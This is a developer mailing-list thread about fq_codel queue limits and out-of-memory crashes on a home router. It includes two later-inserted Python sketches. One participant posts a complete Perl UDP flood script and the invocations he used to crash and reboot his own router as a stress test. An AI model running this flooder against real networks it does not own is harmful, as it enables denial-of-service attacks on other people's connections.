Hi Dave, sorry for accidentally taking this private, so here it is again.
On Aug 20, 2012, at 12:41 PM, Sebastian Moeller wrote:
> Hi Dave,
>
> thanks for the long and thoughtful response.
>
>
> On Aug 20, 2012, at 12:12 PM, Dave Taht wrote:
>
>> Dear Sebastian:
>>
>> In addition to your udp flooding DoS attack, I attacked cero also by
>> using diffserv marking in netperf (-Y codepoint,codepoint) to saturate
>> all 4 wifi fq_codel queues, and also would get the router to have
>> memory allocation failures and ultimately crash in the same way you
>> are crashing it. I can similarly do what you just did with rtp
>> flooding. You are correct that codel is tuned for tcp, and that
>> fq_codel by maintaining many queues is even more susceptible to a
>> tuned udp flooding attack on a memory limited device such as this.
>
> Ah, I did not think that I reported something new with regard to crashing
> the router, it was more about me having found a way to reproduce it without
> netperf/iperf (which I never really got to run, due to a lack of endpoints)
> as well as without using http://broadband.mpi-sws.org/residential/ (as this
> only allows around 5 runs per 24-hour period).
>
>>
>> I tried to cope with this in 3.3.8-10/11 by reducing the packet
>> limits, which helped a lot. Unfortunately the settings I used then
>> were below codel's reaction time, which invoked "interesting" tail
>> drop behavior, so I arbitrarily doubled them in -17. To invoke more of
>> the kind of problems you are encountering…
>
> That would be limit 600? Is 600 a problem for a single flow, or due to
> the limit being for the sum of all flows? Would an additional per-flow limit
> be able to help deal with this issue?
>
>>
>> 0) Since then I have been looking into ways to improve codel's
>> reaction time that are in the ns2 model presently, also fixing an
>> assumption about newton's method that didn't hold in reverse, and also
>> means to incorporate more aggressive codel behavior when queue limits
>> are near to being exceeded.
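For anyone following the remark about Newton's method: as far as I know, CoDel spaces its drops at interval/sqrt(count), and the Linux code approximates 1/sqrt(count) with a single Newton step each time count changes instead of computing a square root. Below is a minimal floating-point sketch of that idea, assuming the usual 100 ms interval. The function names are mine and not taken from the kernel or ns2 sources. It also shows that one step is far less accurate when count falls sharply; whether that is the "didn't hold in reverse" problem is only my guess.

```python
import math

INTERVAL_MS = 100.0  # assumed CoDel interval (the commonly quoted default)


def newton_step(inv_sqrt, count):
    """One Newton iteration toward 1/sqrt(count), starting from inv_sqrt."""
    return inv_sqrt * (3.0 - count * inv_sqrt * inv_sqrt) / 2.0


def next_drop_delay_ms(inv_sqrt):
    """Control law: the next drop is scheduled interval / sqrt(count) later."""
    return INTERVAL_MS * inv_sqrt


# Counting up one at a time: a single step per increment tracks the
# exact value closely once count has grown a little.
inv = 1.0  # exact for count = 1
for count in range(2, 17):
    inv = newton_step(inv, count)
up_error = abs(inv - 1.0 / math.sqrt(16))

# Jumping from count = 16 straight down to count = 2: one step starting
# from the old estimate lands far away from 1/sqrt(2).
down = newton_step(1.0 / math.sqrt(16), 2)
down_error = abs(down - 1.0 / math.sqrt(2))

print(f"count=16: next drop in {next_drop_delay_ms(inv):.1f} ms, "
      f"abs error {up_error:.4f}")
print(f"16 -> 2 in one step: estimate {down:.3f}, "
      f"exact {1.0 / math.sqrt(2):.3f}, abs error {down_error:.3f}")
```

The upward direction works because the previous estimate is already close to the new target; in the downward direction the starting point is too far off for one iteration to recover.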
>
> I see, ramping up the drop frequency once space gets tight...
>
>>
>> Unfortunately as the memory pressure problem starts in the driver,
>> it's not communicated up the stack to where it could be controlled
>> better…
>
> Argh, sounds like fun :)
>
>>
>> 0) I would like to avoid having to determine if a queue is tcp or
>> "other", and then having different kinds of drop strategies for each.
>> That said, it seems possible to implement that…
>
> Since the flows are filled by hash, a flow might contain both, correct?
> So being more firm in flows containing non-tcp traffic might hurt some TCP
> in shared bins.
>
>>
>> 1) A workaround of sorts for the 64MB 3700v2 has been to give up on
>> named and get some memory back that way.
>
> Since I am a layman, what is the quick and dirty (and reversible) way
> to do so, so I can test this?
>
>>
>> 2) I believe, but am not sure, that Linux 3.6(5?) has some stuff in it
>> to get skb memory allocations done more efficiently. Eric and I and
>> felix had talked about it, I don't know what was implemented.
>
> ISTR there was something about fixing the accounting of drivers so they
> track all buffers and not just part of the payload (truesize was the word).
> Which totally went over my head, but sounds like something that might help...
>
>>
>> 3) It may be possible to improve how the memory allocations from the
>> 2048 slab work in general. I imagine that half of memory is being
>> wasted on big packets otherwise.
>
> I had a quick look at the SLUB documentation and see no way to do so
> that I can understand.
>
>>
>> 4) some options for improving fq_codel for more memory constrained
>> home environments better.
>>
>> 4a) On the wifi front (as well as other devices with multiple hardware
>> queues), I envision something like "mfq_codel", which would have an
>> overall similar packet limit to a single fq_codel, but be able to
>> deliver (and fair queue) packets to the underlying hardware queues
>> independently.
>
> Sounds like something to test I guess (but out of my league)
>
>>
>> 4b) On the home to-ISP gateway qos front, a rate limited (tbf)
>> mfq_codel with 2-4 queues would replace the complexity of hfsc or htb
>> with a default qdisc that "just worked" without any scripting. It
>> could be mildly more responsive (htb buffers up some data and has its
>> own notion of time and quantums), thus cpu and memory usage would be
>> lower than htb + multiple fq_codel queues.
>
> But I thought that being able to arbitrarily prioritize some traffic in
> a home router is a good thing; and that will require some hierarchical system
> and will bring along some complexity...
>
>
>>
>> Getting something that scaled down to 10s of kbits and up to gigabits
>> would be hard, tho. HTB needs to be tuned when running lower or higher
>> than its original operating range, presently, and that is where, in
>> part, the simple_qos.sh effort is "stuck".
>
> Can't this be divined from the configured up and downlink rates? Or
> are you thinking about dynamic changes in link-rates?
>
>>
>> 4c) Another thought would be to have a weighted packet (to handle
>> classification) oriented sfq codel or qfq_codel rather than separate
>> fq_codel queues that are each byte-aware... we have CPU to burn, but
>> not memory…
>
> That I admit I do not understand.
>
> Thanks a lot & best regards
> Sebastian
>
>>
>> On Mon, Aug 20, 2012 at 11:24 AM, Sebastian Moeller <moell...@gmx.de> wrote:
>>> Hi Dave,
>>>
>>> so I went to play around with this a bit more. I turned to UDP flooding my
>>> cable modem through the router and this surely allows me to create enough
>>> load on the wndr3700v2 to cause the allocation errors and as a "bonus" also
>>> to drive the router to reboot (driven by the watchdog timer?).
>>> Here is the script I used over 5 GHz wireless (from
>>> http://blog.ioshints.info/2008/03/udp-flood-in-perl.html)
>>>
>>> #!/usr/bin/perl
>>
>> It would be nice to have a C or lua version of this sort of test.
>>
>>> ##############
>>>
>>> # udp flood.
>>> ##############
>>>
>>> use Socket;
>>> use strict;
>>>
>>> if ($#ARGV != 3) {
>>>   print "flood.pl <ip> <port> <size> <time>\n\n";
>>>   print " port=0: use random ports\n";
>>>   print " size=0: use random size between 64 and 1024\n";
>>>   print " time=0: continuous flood\n";
>>>   exit(1);
>>> }
>>>
>>> my ($ip,$port,$size,$time) = @ARGV;
>>>
>>> my ($iaddr,$endtime,$psize,$pport);
>>>
>>> $iaddr = inet_aton("$ip") or die "Cannot resolve hostname $ip\n";
>>> $endtime = time() + ($time ? $time : 1000000);
>>>
>>> socket(flood, PF_INET, SOCK_DGRAM, 17);
>>>
>>>
>>> print "Flooding $ip " . ($port ? $port : "random") . " port with " .
>>>   ($size ? "$size-byte" : "random size") . " packets" .
>>>   ($time ? " for $time seconds" : "") . "\n";
>>> print "Break with Ctrl-C\n" unless $time;
>>>
>>> for (;time() <= $endtime;) {
>>>   $psize = $size ? $size : int(rand(1024-64)+64) ;
>>>   $pport = $port ? $port : int(rand(65500))+1;
>>>
>>>   send(flood, pack("a$psize","flood"), 0, pack_sockaddr_in($pport, $iaddr));
>>> }
>>>
>>> called as either
>>> udp_flood.pl 192.168.100.1 0 1024 240
>>> or
>>> udp_flood.pl 192.168.100.1 32000 1024 240
>>>
>>> The first version with randomized port number spreads the load nicely over
>>> many fq_codel bins/flows and seems slightly more likely to cause allocation
>>> errors and reboots than the 2nd invocation which restricts itself to port
>>> 32000 and presumably just one flow.
>>> I wonder how to make cerowrt survive this kind of stress test…
>>>
>>> best
>>> Sebastian
>>>
>>>
>>> On Aug 15, 2012, at 9:08 PM, Dave Taht wrote:
>>>
>>>> re: ath: skbuff alloc of size 1926 failed
>>>>
>>>> as for the ath skbuff problem, I've seen that a lot.
>>>> I had put hard packet limits (~600) on fq_codel in -11 and prior that
>>>> were too low and it mostly went away, but I hit tail drop behavior
>>>> everywhere, instead of codel behavior. What I have now (typically 1200)
>>>> may well be too high, but not as overly high as the default (10k packets).
>>>> There may be another means of increasing the size of that slab pool or
>>>> making it less onerous.
>>>>
>>>> I would like it if codel "kicked in" earlier than it currently does.
>>>> The code in ns2 is currently using half the period that the linux code
>>>> is. This would control things better, or so I hope (planning on trying
>>>> this as I get time)
>>>>
>>>> I am also considering means of artificially upscaling the drop
>>>> scheduler when we get close to queue limits.
>>>>
>>>> See some discussions on the codel list for these issues. (sims are
>>>> easier to deal with than cerowrt, too!)
>>>>
>>>> as for bind, it should be automagically restarted from xinetd, no need
>>>> to fiddle with anything. However, since you are already under massive
>>>> memory pressure, it may well fail to start up that way, too. At the
>>>> moment, I've largely given up on bind on anything but a more core home
>>>> gw, and am running dnsmasq on everything (3700v2, picostations,
>>>> nanostations) but the 3800s. (and the ones I run it on, aren't being
>>>> used for wifi right now).
>>>>
>>>> Lastly: Swap space won't help you on exhausting kernel limits.
>>>>
>>>> I'm glad you can reproduce the ath: slab problem - I can get it too at
>>>> high rates using netperf over wifi. I will try a 3700v2 with and
>>>> without bind to see if it's still there in 3.3.8-17. In the meantime
>>>> if anyone knows how to get more allocations in that (2048? 4096?) slab
>>>> by default, perhaps that will help?
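To put rough numbers on the packet limits discussed above: if every queued packet pins one buffer from the 2048-byte slab, the worst case for full queues is simply limit × queues × 2048 bytes. That per-packet cost is an assumption on my part; the real figure depends on the driver and on how truesize is accounted. The four wifi queues and the 64 MB of RAM come from this thread, and 10240 is my reading of the "10k packets" default. A back-of-the-envelope sketch:

```python
SLAB_BYTES = 2048            # assumed per-packet buffer cost (the "2048 slab")
WIFI_QUEUES = 4              # the four wifi fq_codel queues from the thread
RAM_BYTES = 64 * 1024 ** 2   # 64 MB wndr3700v2


def worst_case_bytes(packet_limit, queues=WIFI_QUEUES, slab=SLAB_BYTES):
    """Upper bound on buffer memory if every queue fills to its packet limit."""
    return packet_limit * queues * slab


for limit in (600, 1200, 10240):
    used = worst_case_bytes(limit)
    print(f"limit {limit:>5}: {used / 1024 ** 2:6.1f} MiB "
          f"({100 * used / RAM_BYTES:5.1f}% of RAM)")
```

Under these assumptions the default limit alone could ask for more buffer memory than the router has, which would fit the observation that lowering the limit makes the allocation failures mostly go away.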
>>>>
>>>>
>>>>
>>>> On Wed, Aug 15, 2012 at 10:23 AM, Sebastian Moeller <moell...@gmx.de>
>>>> wrote:
>>>>> Hi Dave,
>>>>>
>>>>> great work, as always I upgraded my production router to the latest and
>>>>> greatest (since I only have one router…). And it works quite well for
>>>>> normal usage…
>>>>> Netalyzr reports around 2800 ms of uplink buffering, yet
>>>>> saturating the uplink does not affect ping times to a remote target
>>>>> noticeably, basically the same as for all codellized cero versions I
>>>>> tested so far...
>>>>>
>>>>> Some notes and a question:
>>>>> I noticed that even given plenty of swap space (1GB on a usb stick),
>>>>> using http://broadband.mpi-sws.org/residential/ to exercise UDP stress
>>>>> (on the uplink I assume) I can easily produce (I run the test from a
>>>>> macosx via 5GHz wireless over 1.5 yards):
>>>>> Aug 15 01:16:29 nacktmulle kern.err kernel: [175395.132812] ath: skbuff alloc of size 1926 failed
>>>>> (and plenty of those…).
>>>>> What then happens is that the OOM killer will aim for bind (reasonable
>>>>> since it is the largest single process) and kill it. When I try to
>>>>> restart bind by:
>>>>> root@nacktmulle:~# /etc/rc.d/S47namedprep start
>>>>> root@nacktmulle:~# /etc/rc.d/S48named restart
>>>>> Stopping isc-bind
>>>>> /etc/chroot/named//var/run/named/named.pid not found, trying brute force
>>>>> killall: named: no process killed
>>>>> Kicking isc-bind in xinetd
>>>>> rndc: connect failed: 127.0.0.1#953: connection refused
>>>>> And bind does not start again and the router becomes less than useful.
>>>>> Now I assume I am doing something wrong, but what? If you have any idea
>>>>> how to solve this short of a reboot of the router (my current method) I
>>>>> would be happy to learn.
>>>>>
>>>>>
>>>>>
>>>>> best regards
>>>>> sebastian
>>>>>
>>>>> On Aug 12, 2012, at 11:08 PM, Dave Taht wrote:
>>>>>
>>>>>> I'm too tired to write up a full set of release notes, but I've been
>>>>>> testing it all day, and it looks better than -10 and certainly better
>>>>>> than -11, but I won't know until some more folk sit down and test it,
>>>>>> so here it is.
>>>>>>
>>>>>> http://huchra.bufferbloat.net/~cero1/3.3/3.3.8-17/
>>>>>>
>>>>>> fresh merge with openwrt, fix to a bind CVE, fixes for 6in4 and quagga
>>>>>> routing problems, and a few tweaks to fq_codel setup that might make
>>>>>> voip better.
>>>>>>
>>>>>> Go forth and break things!
>>>>>>
>>>>>> In other news:
>>>>>>
>>>>>> Van Jacobson gave a great talk about bufferbloat, BQL, codel, and
>>>>>> fq_codel at last week's ietf meeting. Well worth watching. At the end
>>>>>> he outlines the deployment problems in particular.
>>>>>>
>>>>>> http://recordings.conf.meetecho.com/Recordings/watch.jsp?recording=IETF84_TSVAREA&chapter=part_3
>>>>>>
>>>>>> Far more interesting than this email!
>>>>>>
>>>>>>
>>>>>> --
>>>>>> Dave Täht
>>>>>> http://www.bufferbloat.net/projects/cerowrt/wiki - "3.3.8-17 is out
>>>>>> with fq_codel!"
>>>>>> _______________________________________________
>>>>>> Cerowrt-devel mailing list
>>>>>> Cerowrt-devel@lists.bufferbloat.net
>>>>>> https://lists.bufferbloat.net/listinfo/cerowrt-devel